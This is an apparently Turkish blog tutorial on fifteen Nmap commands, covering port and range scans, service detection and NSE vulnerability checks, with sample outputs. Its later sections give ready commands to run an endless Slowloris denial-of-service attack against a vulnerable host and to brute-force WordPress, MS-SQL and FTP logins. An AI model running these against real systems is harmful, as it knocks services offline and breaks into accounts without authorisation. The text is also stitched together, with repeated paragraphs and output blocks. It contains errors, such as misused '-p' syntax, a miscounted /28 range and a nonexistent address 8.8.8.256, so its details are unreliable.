NMAP NEDİR ?
Nmap , sızma testlerinde ve zaafiyet bulmak için yapılan taramalarda yaygın olarak kullanılan bir yazılımdır.Yerel ağın , uzaktaki bir bilgisayarın veya bir websitesininin ağ bilgilerini denetlemek ve keşfetmek için kullanılabilir.
Bu aracın en iyi özelliklerinden bazıları açık kaynaklı, ücretsiz, çok platformlu olması ve her yıl sürekli güncellemeler almasıdır. Aynı zamanda büyük bir artısıda var: şuanda mevcut olan diğer tüm tarama yazılımlarına kıyasla en az hataya sahip ana bilgisayar ve ağ tarayıcılarından biridir. Tarama ve haritalama yaparken size geniş komut olanakları sağlar ve bu yazılımı en başından anlayabilmek için internette sayısız döküman bulunmaktadır.
Nmap şunları yapmak için kullanılabilir :
En iyi 15 Nmap komutu örneği
Bu aracın en iyi özelliklerinden bazıları açık kaynaklı, ücretsiz, çok platformlu olması ve her yıl sürekli güncellemeler almasıdır. Aynı zamanda büyük bir artısıda var: şuanda mevcut olan diğer tüm tarama yazılımlarına kıyasla en az hataya sahip ana bilgisayar ve ağ tarayıcılarından biridir. Tarama ve haritalama yaparken size geniş komut olanakları sağlar ve bu yazılımı en başından anlayabilmek için internette sayısız döküman bulunmaktadır.
Nmap şunları yapmak için kullanılabilir :
- Tam bir bilgisayar ağ haritası oluşturur.
- Ana bilgisayarların uzak IP adreslerini bulur.
- Taradığınız ağdaki bilgisayarların işletim sistemlerini ve yazılım ayrıntılarını görüntüler.
- Yerel veya uzaktaki ağlarda açık portları algılayabilir.
- Kendi bilgisayarınızı veya ağınızı taratarak güvenlik açıklarınızı görmenizi ve onları farkedip düzeltmenize olanak sağlar.
Genel kullanımı ;
nmap < ip adresi veya site adresi >
1. IP veya Ana bilgisayara karşı temel nmap taraması
Basit ve genel tarama örneği.
nmap 1.1.1.1
2. Yerel veya uzak sunucuda belirli portları veya tüm port aralıklarını tarayın
Nmap, tüm olası bağlantı noktalarını tarayabilir, ancak daha hızlı sonuçlar elde etmek için belirli bağlantı noktalarını da tarayabilirsiniz.
nmap -p 80,443 localhost
Yukarıdaki örnekte kendi bilgisayarımızın 80 (http) ve 443 (https) portlarını taradık.
3. Birden çok IP adresi tarama
Birden fazla IP adresini taramak için aşağıdaki komutu kendinize göre değiştirip deneyebilirsiniz.
nmap 1.1.1.1 8.8.8.8
Ayrıca ardışık IP adreslerini de tarayabilirsiniz ,
nmap -p 1.1.1.1,2,3,4
Bu komut
1.1.1.1
, 1.1.1.2
, 1.1.1.3
ve 1.1.1.4
IP adreslerini tarayacaktır.4. IP aralıklarını tarama
Nmap'ı tüm CIDR (Sınırsız Alanlar Arası Yönlendirme ) IP aralıklarını taramak için de kullanabilirsiniz, örneğin:
nmap -p 8.8.8.0/28
Bu komut
8.8.8.1
ile
8.8.8.14
arasındaki 14 ardışık IP adresini tarar .
Örneğin, C sınıfı IP aralığının tamamını taramak için özel karakterler kullanabilirsiniz, örneğin:
nmap 8.8.8.*
Bu komut
8.8.8.1
ile 8.8.8.256
aralığında bulunan 256 IP adresini tarar .
Bazı IP'leri IP aralığı taramasının dışında tutmanız gerekirse, aşağıda gördüğünüz gibi “--exclude” seçeneğini kullanabilirsiniz:
nmap -p 8.8.8.* --exclude 8.8.8.1
Bu komut 8.8.8.1 harici C sınıfı için 256 ya kadr olan tüm IP leri tarayacaktır.
5. En popüler bağlantı noktalarını tarama
“–Top-port” parametresini belirli bir sayı ile birlikte kullanmak , girilen sayı kadar en popüler portları taramayı sağlar.
nmap --top-ports 20 192.168.1.106
“20” yi istediğiniz numara ile değiştiriniz. Çıktı örneği:
[root@kali:~]nmap --top-ports 20 localhost
Starting Nmap 6.40 ( http://nmap.org ) at 2018-10-01 10:02 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000016s latency).
Other addresses for localhost (not scanned): 127.0.0.1
PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp filtered http
110/tcp closed pop3
111/tcp closed rpcbind
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
443/tcp filtered https
445/tcp closed microsoft-ds
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy
6. Metin Dosyası (.txt) içerisinden IP tarama
Bazen bir metin belgesinde kayıtlı IP ' leri taratmanız gerekebilir.Böyle bir durumda Nmap'i kullanmak mantıklı bir seçim olabilir.
Diyelim ki içinde bu satırları içeren bir list.txt dosyası oluşturdunuz:
192.168.1.106
cloudflare.com
microsoft.com
siberportali.blogspot.com
“-iL” parametresi dosyadan veriyi okumanızı ve tüm bu ip adreslerinin sizin için taranmasını sağlar:
nmap -iL list.txt
192.168.1.106
cloudflare.com
microsoft.com
siberportali.blogspot.com
7. Nmap tarama sonuçlarınızı bir dosyaya kaydetme
Aşağıdaki örnekte sonuçlarımızı bir metin dosyasına aktaracağız / saklayacağız:
nmap -oN output.txt siberportali.blogspot.com
Nmap, dosyaları XML biçiminde dışa aktarabilir, aşağıdaki komutta olduğu gibi.
nmap -oX output.xml siberportali.blogspot.com
8. Dns isim çözümlemesini devre dışı bırakma
Taramalarınızı biraz hızlandırmanız gerekirse sadece “-n” parametresini ekleyin.Bu işlem dns çözümlemesini devre dışı bırakacaktır.
[root@kali:~]nmap -p 80 -n 8.8.8.8
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:15 -03
--> Nmap scan report for 8.8.8.8
Host is up (0.014s latency).
PORT STATE SERVICE
80/tcp filtered http
Normal komutla diğeri arasındaki farkı görebilirsiniz.
[root@kali:~]nmap -p 80 8.8.8.8
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:15 -03
--> Nmap scan report for google-public-dns-a.google.com (8.8.8.8)
Host is up (0.014s latency).
PORT STATE SERVICE
80/tcp filtered http
[root@kali:~]nmap -p 80 -n 8.8.8.8
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:15 -03
--> Nmap scan report for 8.8.8.8
Host is up (0.014s latency).
PORT STATE SERVICE
80/tcp filtered http
[root@kali:~]nmap -p 80 8.8.8.8
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:15 -03
--> Nmap scan report for google-public-dns-a.google.com (8.8.8.8)
Host is up (0.014s latency).
PORT STATE SERVICE
80/tcp filtered http
9. Scan + OS ve hızlı işlem ile Servis Tespiti yapma
“-A” parametresini kullanmak, işletim sistemi ve servis algılaması yapmanızı sağlar ve aynı zamanda daha hızlı tarama için bunu “-T4” ile birleştiriyoruz.
nmap -A -T4 siberportali.blogspot.com
10. Hizmet ve Arka Plan sürümlerini bulma
Bu -sV parametreleri kullanılarak yapılabilir
nmap -sV localhost
Burada görebileceğiniz gibi:
[root@kali:~]nmap -sV localhost
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:28 -03
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000020s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
631/tcp open ipp CUPS 2.2
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
Oku oku sıkılmış gibisin istersen ufak bir ara verebilirsin.
[root@kali:~]nmap -sV localhost
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:28 -03
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000020s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
631/tcp open ipp CUPS 2.2
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
11. TCP veya UDP protokollerini kullanarak tarama
Nmap ile ilgili en sevdiğimiz şeylerden biri, hem TCP hem de UDP protokolleri için işe yaraması. Hizmetlerin çoğu TCP'de çalıştırılırken, UDP tabanlı hizmetleri tarayarak da büyük bir avantaj elde edebilirsiniz. Bazı örnekler görelim.
Standart TCP tarama çıkışı:
[root@kali:~]nmap -sT 192.168.1.1
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:33 -03
Nmap scan report for 192.168.1.1
Host is up (0.58s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
80/tcp open http
1900/tcp open upnp
20005/tcp open btx
49152/tcp open unknown
49153/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
“-SU” parametresini kullanarak UDP tarama sonuçları:
[root@kali:~]nmap -sU localhost
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:37 -03
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000021s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 997 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
111/udp open rpcbind
5353/udp open|filtered zeroconf
[root@kali:~]nmap -sT 192.168.1.1
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:33 -03
Nmap scan report for 192.168.1.1
Host is up (0.58s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
80/tcp open http
1900/tcp open upnp
20005/tcp open btx
49152/tcp open unknown
49153/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
[root@kali:~]nmap -sU localhost
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:37 -03
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000021s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 997 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
111/udp open rpcbind
5353/udp open|filtered zeroconf
12. Nmap kullanarak CVE algılama
CVE (Common vulnerabilities and exposures) : Tespit edilen güvenlik zaafiyetlerinin belli identifier'lara(id değerleri) göre tutulduğu bir liste ya da veri tabanı.İlgi duyanlar için http://cve.mitre.org adresinden ulaşabilirsiniz.İdentifier temin edilebilir , ya da bir açık için bilgi alınacaksa elinizdeki identifier'a göre arama yapılabilir.
Nmap'ın tüm ağ ve sistem yöneticilerinin bilmediği en büyük özelliklerinden biri “Nmap Scripting Engine” ( Nmap Script Motoru olarak bilinir ) 'dir. NSE , varolan Nmap yeteneklerini geliştirmek ve Nmap dahilindeki formatlarla çıktı alabilmek için kullanılan bir yapıdır.
NSE'yi kullanmak, sistem ve güvenlik açığı taramalarını otomatikleştirmek için çok önemlidir. Örneğin, hedefinize karşı tam bir güvenlik açığı testi yapmak istiyorsanız, aşağıdaki parametreleri kullanabilirsiniz:
nmap -Pn --script vuln 192.168.1.105
Çıktı örneği:
[root@kali:~]nmap -Pn --script vuln 192.168.1.105
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:46 -03
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.105
Host is up (0.00032s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
1900/tcp open upnp
20005/tcp open btx
49152/tcp open unknown
49153/tcp open unknown
Gördüğünüz gibi, bu güvenlik açığı testinde bir CVE (Slowloris DOS saldırısı) tespit ettik.
Nmap'ın tüm ağ ve sistem yöneticilerinin bilmediği en büyük özelliklerinden biri “Nmap Scripting Engine” ( Nmap Script Motoru olarak bilinir ) 'dir. NSE , varolan Nmap yeteneklerini geliştirmek ve Nmap dahilindeki formatlarla çıktı alabilmek için kullanılan bir yapıdır.
[root@kali:~]nmap -Pn --script vuln 192.168.1.105
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:46 -03
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.105
Host is up (0.00032s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
1900/tcp open upnp
20005/tcp open btx
49152/tcp open unknown
49153/tcp open unknown
13. DOS'u Nmap ile Başlatma
Nmap'in özellikleri hiç bitmiyor gibi görünüyor ve NSE sayesinde ağ testlerimizde DOS saldırıları başlatmamıza bile izin veriyor.
Önceki örneğimizde (# 12), sunucunun Slowloris saldırısına karşı savunmasız olduğunu gördük ve şimdi sonsuza dek bir döngüde DOS saldırısı başlatarak bu güvenlik açığından yararlanmaya çalışacağız:
nmap 192.168.1.105 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
Önceki sorudaki açığın devamı niteliğindedir.
nmap 192.168.1.105 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
Önceki sorudaki açığın devamı niteliğindedir.
14. BruteForce (kaba kuvvet ) Saldırıları Başlatma
NSE gerçekten büyüleyici - hayal edebileceğiniz her şey için senaryolar içeriyor. WordPress, MSSQL ve FTP sunucusuna karşı aşağıdaki üç Brute Force Attack örneğine bakalım.
Not : Bunu anlayabilmeniz için Brute Force ' u bilmeniz ya da en azından fikir sahibi olmanız gerekmektedir.
WordPress kaba kuvvet saldırısı:
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
Yukarıdaki komutu kısaca özetlemek gerekirse ,Brute Force Attack için http-wordpress-brute scripti kullanılmıştır.'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, burada kullanıcı adı ve şifre için wordlistler(denenicek olan şifrelerin oluşturduğu txt dosyası) tanımlanmış ve url tipi belirtilmiştir.http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
brute force atağının iş gücü belirtilip hedef ip yazılır.
MS-SQL ve FTP 'deki mantık hemen hemen aynıdır.
MS-SQL'e karşı kaba kuvvet saldırısı:
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105
FTP kaba kuvvet saldırısı:
nmap --script ftp-brute -p 21 192.168.1.105
NSE gerçekten büyüleyici - hayal edebileceğiniz her şey için senaryolar içeriyor. WordPress, MSSQL ve FTP sunucusuna karşı aşağıdaki üç Brute Force Attack örneğine bakalım.
Not : Bunu anlayabilmeniz için Brute Force ' u bilmeniz ya da en azından fikir sahibi olmanız gerekmektedir.nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
brute force atağının iş gücü belirtilip hedef ip yazılır.
MS-SQL ve FTP 'deki mantık hemen hemen aynıdır.
MS-SQL'e karşı kaba kuvvet saldırısı:
15. Sunucuda sistemi uzaktan kontrol edebilen malware (zararlı yazılım) taraması yapma
Nmap, Identd, Proftpd, Vsftpd, IRC, SMB ve SMTP gibi birkaç popüler işletim sistemi hizmetinde kapsamlı testler yaparak kötü amaçlı yazılımları ve arka kapıları algılayabilir. Ayrıca, uzak sunuculardaki popüler kötü amaçlı yazılım işaretlerini kontrol etmek ve Google'ın Güvenli Tarama ve VirusTotal veritabanlarını da entegre etmek için bir modüle sahiptir.
Yaygın olarak kullanılan bir kötü amaçlı yazılım taraması aşağıdakileri kullanarak gerçekleştirilebilir:
nmap -sV --script=http-malware-host 192.168.1.105
Veya Google’ın Kötü Amaçlı Yazılım çekini kullanarak:
nmap -p80 --script http-google-malware zararlıyazilima-sahip-site.com
Çıktı örneği:
80/tcp open http |_http-google-malware.nse: Host is known for distributing malware.
Nmap, günümüzde infosec uzmanları tarafından kullanılan en eksiksiz ve doğru port tarayıcılardan biridir. Bununla beraber, basit bağlantı noktası tarama görevlerini gerçekleştirebilir veya DOS saldırıları başlatmak, kötü amaçlı yazılımları veya uzak ve yerel sunuculardaki kaba kuvvet ataklarını tespit etmek için güçlü komut dosyası altyapısını kullanabilirsiniz.
Bugün uzak ana bilgisayarları taramak için ilk on beş Nmap komutunu ele aldık.
Vakit ayırdığınız için teşekkürler.Umarım sizin için faydalı olmuştur bu bilgiler.
Vakit ayırdığınız için teşekkürler.Umarım sizin için faydalı olmuştur bu bilgiler.
0 Yorumlar